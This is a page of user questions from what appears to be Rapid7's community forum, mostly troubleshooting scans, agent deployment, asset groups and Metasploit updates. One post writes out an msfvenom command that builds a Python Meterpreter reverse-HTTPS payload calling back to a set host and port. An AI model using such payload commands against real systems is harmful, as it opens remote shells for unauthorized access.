Hello. Nexpose scanner is failing to authenticate via SSH because the configured port is not 22. When setting up the credentials I test them by specifying the correct port and it works just fine, but once I run the scan it doesn't try to authenticate in the specified 3000 port and doesn't even recognize the service as running, thus saying "no credentials used". How can I tell Nexpose that it should authenticate via SSH on a different port? the "restrict to port" field did nothing.
Posted by John Web 13 days ago
Hello all. A little help if possible please. I am running Kali 2018 v1 with metasploit v4.17.9-dev. I don't want to update to version 5 because this is not fully compatible with Armitage and I really need this tool due to some courses I teach at my local community. I have noticed that version 4.17 keeps on updating with version 4.17.84 released few days ago (https://github.com/rapid7/metasploit-framework/releases/tag/4.17.84). My question is how do I update my current version of msf without upgrading to v5? apt install metasploit-framework upgrades the entire msf to v5 but I want to keep staying on v4 and receive the updates released. Thank you for your time.
Posted by Alme 14 days ago
I have been trying to deploy the IDR agent using GPO with no luck. I turned on debugging and the installer cannot find the configuration files. I have followed the guide here: https://insightagent.help.rapid7.com/docs/mass-deployments#section-microsoft-group-policy Here is the error: Failure: One or more of the following files were not found: config.json, cafile.pem, client.crt, client.key. Make sure you locate these files in the same directory as the installer. I also used ADSI edit to add the additional files as follows to the msiFileList variable : 0:\\fs01\Software Deployment\agentInstaller-x86_64.msi 1:\\fs01\Software Deployment\config.json 2:\\fs01\Software Deployment\client.key 3:\\fs01\Software Deployment\client.crt 4:\\fs01\Software Deployment\cafile.pem Has anyone deployed this successfully with a GPO? Thanks!
Posted by Phil 14 days ago
Hi, I have installed Rapid7 Insignt VM in 2016 Server in a VD. When I tried to login to for ex. 192.168.1.100:3780 from another machine in same network, I can't get into the security console. Then I disabled the domain firewall in Server 2016 and succeed to login to the security console. I guess its not best practice to disable the domain firewall. So, anybody has any idea, how to work around without disabling the firewall. Reagards Monirul
Posted by Monirul B 14 days ago
Hi, does Rapid7 offer security consultation service? When we use products like AppSpider or InsightAppSec to scan our web applications and generate a report of vulnerabilities. Does Rapid7 offer analysis and expert advice on how to fix the vulnerabilities based on the technologies our application uses?
Posted by Nguyen Nguyen 14 days ago
Hello all. Thanks a lot in advance for your consideration. I would like to be able to generate a python/meterpreter/reverse_https payload, with the appreciated option StagerVerifySSLCert. After a lot of hours of syntax verifications, i can't get this wonderfull output before getting meterpreter session : "Meterpreter will verify SSL Certificate with SHA1 hash" I don't understand where is my mistake, and after having analyzed meterpreter_paranoid_mode.sh i can't reproduce this kind of option for python payload. Here is the basic command i'm using with no success: msfvenom -p python/meterpreter/reverse_https StagerVerifySSLCert=true HandlerSSLCert=/root/Desktop/google.pem LHOST=192.168.1.1 LPORT=443 -o /root/Desktop/test.py Any help would be appreciated. Have a nice day and thanks for reading me.
Posted by Eric 16 days ago
We are considering going with Rapid 7 for vulnerability scanning. We will have to deploy scan engines at over 150 sites. Does anyone have any suggestions on decently priced Linux boxes that can run Nexpose for site deployment?
Posted by Thomas Clarke 17 days ago
Trying to create a asset group with owner tags in them. When i apply the first owner tag i get all the assets associated correctly, i add the second one and it is suppose to equal out to 26 asset total, but its either 20 total or 6 total. I have switched the all and any around and nothing changes. with applying two tags. What is going on ????
Posted by Vanessa villalpando 17 days ago
Not sure whether or not this is a bug but I have attempted to create a regex based on hostname and would like to make it non-case specific however the usual /i does not appear to work nor does ?i. Has anyone had any luck with this switch in Nexpose?
Posted by Robert DeBellis 17 days ago
Hello, My goal is to have a list of assets and their vulnerabilities, where vulnerability risk score >= 500 and vulnerability severity is critical or severe. It seems like it should be a relatively straightforward query, but I have had no luck yet.
Posted by Will Fulton 18 days ago
Hi, I am looking to write a custom vulnerability scan that will run against the MSSQL databases in my environment and return the results of a SQL query. Ultimately, I am hoping to check for all accounts database that have not changed their password in X days. The following pseudocode uses @@version for simplicity. <VulnerabilityCheck id="foo" version="1.0" scope="endpoint"> <NetworkService type="MSSQL"> <MSSQLQueryResponse> <query>SELECT @@version</query> </MSSQLQueryResponse> </NetworkService> </VulnerabilityCheck> I have read through the tutorials in the Knowledge Base, but am still not sure if this is possible. Thanks in advance!
Posted by Rich R 18 days ago
I have started the scanning on one of the asset, it is showing 36 vulnerabilities and after some time, the scan was incomplete. I have scanned with enhanced logging also, the scan was incomplete with 0 vulnerabilities. Please let us know if any solution and how to resolve this Srini
Posted by Srinivas 18 days ago
Hi, I have found one issue in Nexpose. Remeditaion team has fixed the issues and i have rescanned the asset. The vulnerability is still existing. I have deleted the asset and rescanned again, the vulnerability is fixed. I have lot of asset groups in nexpose and each and every asset is not possible for deleting and rescanning again. is there any one time solution for this. Thanks Srinivas
Posted by Srinivas 19 days ago
Hi All I'm running scan for one of our product and i keep getting this error in vulnerabilities any idea what is wrong <h2> <i>Access is denied.</i> </h2></span> <b> Description: </b>An error occurred while accessing the resources required to serve this request. The server may not be configured for access to the requested URL. <br><br> <b> Error message 401.2.: </b>Unauthorized: Logon failed due to server configuration. Verify that you have permission to view this directory or page based on the credentials you supplied and the authentication methods enabled on the Web server. Contact the Web server's administrator for additional assistance.<br><br>
Posted by Rehan 19 days ago